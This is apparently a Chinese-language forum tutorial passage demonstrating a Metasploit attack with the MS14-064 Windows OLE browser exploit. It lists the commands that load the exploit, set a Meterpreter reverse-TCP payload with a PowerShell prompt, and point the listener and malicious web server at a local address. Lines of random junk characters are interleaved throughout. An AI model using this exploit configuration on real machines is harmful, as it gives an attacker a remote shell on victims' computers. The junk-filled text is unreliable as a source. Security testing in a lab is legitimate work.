7 @ f6 D Q' y 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
' x7 A2 B% P4 t3 _" V8 V3 G. z
4 Y/ U4 o; Z" S! T% R
. @" k: J: {. G7 B
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
' T$ w3 f4 f" K
3 J7 |' n4 E! ^" c9 c5 U+ }
5 L( U, a# M1 c7 [' U 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp! j9 D" t# P1 `7 u! P6 c- T, \
' j; @& J0 D5 x v. _5 y
" B( g2 w; A# B5 L& ` set AllowPowershellPrompt true
4 }1 S& s; \; J' Q$ C0 f
% N2 {; H$ ^& w7 F# }' s
5 n" k+ T r, X& `+ d Set LHOST 192.168.0.109! l' I! h" }3 C( M
, ` o, Z$ I4 l- z5 B7 x- [* t, f
set SRVHOST 192.168.0.109
" q' f0 p1 L9 w+ v
- M! i- Z2 a- H% k# P7 P
4 k$ \, M# n- k1 Q" ^0 M
Set uripath share. Q; g9 A$ i+ s: k& |9 J& q
' C M* o5 q4 `
}8 i; e* u5 C# e' F Set srvport 80
! |7 O- R" ?8 s9 @; K0 D/ T
# N; d' W) r J9 |* ~
+ j+ i& a I% d; E3 I) z4 V) K
! q! W; \7 ?1 N* [# @3 e
# u- Y! u! q. _. u
- C2 E$ ^% l7 r 2 z: s* O. R7 l6 ^; L# M& E
; i+ A; @ m% a$ a6 F+ G
; ?' t4 Y5 t: g4 V2 F8 I& I
* p7 N) p; a8 e3 x f8 f* [0 K
; s L, t5 g2 ?3 {% X9 A. [4 O2 |
r, }! i! e9 w- W- o4 P) g" w( b 5 w% S4 ~8 q/ Y" R& l+ Y
. o% \) Y9 J! y5 v: x J' n
$ z; C8 g( x* h3 I7 o. v3 B
$ \! ~& K; W- z% E4 c3 w! t
, n2 n. C8 T; D- p! }& |
# t+ D/ Q( |. h5 Q) f 下面我们来访问本地地址如图:, X* n( B! n2 \/ c- z
3 K: F; t/ p& r ]1 e" d( r
2 {* I) s' J; K; D, J; T3 k 6 ^2 [9 \7 h/ v7 @6 i
% l" x8 j; W0 m& v: h% E! o" w+ c/ j
9 h5 Z! _$ ]) q% g. t. r; }1 p
2 Q! e; @& S* N; f# c
8 j3 P, t3 I0 p; ?6 g+ Q
; k5 G- @9 J. W$ T# j3 o6 s
7 Q4 o3 u; \' }3 j8 o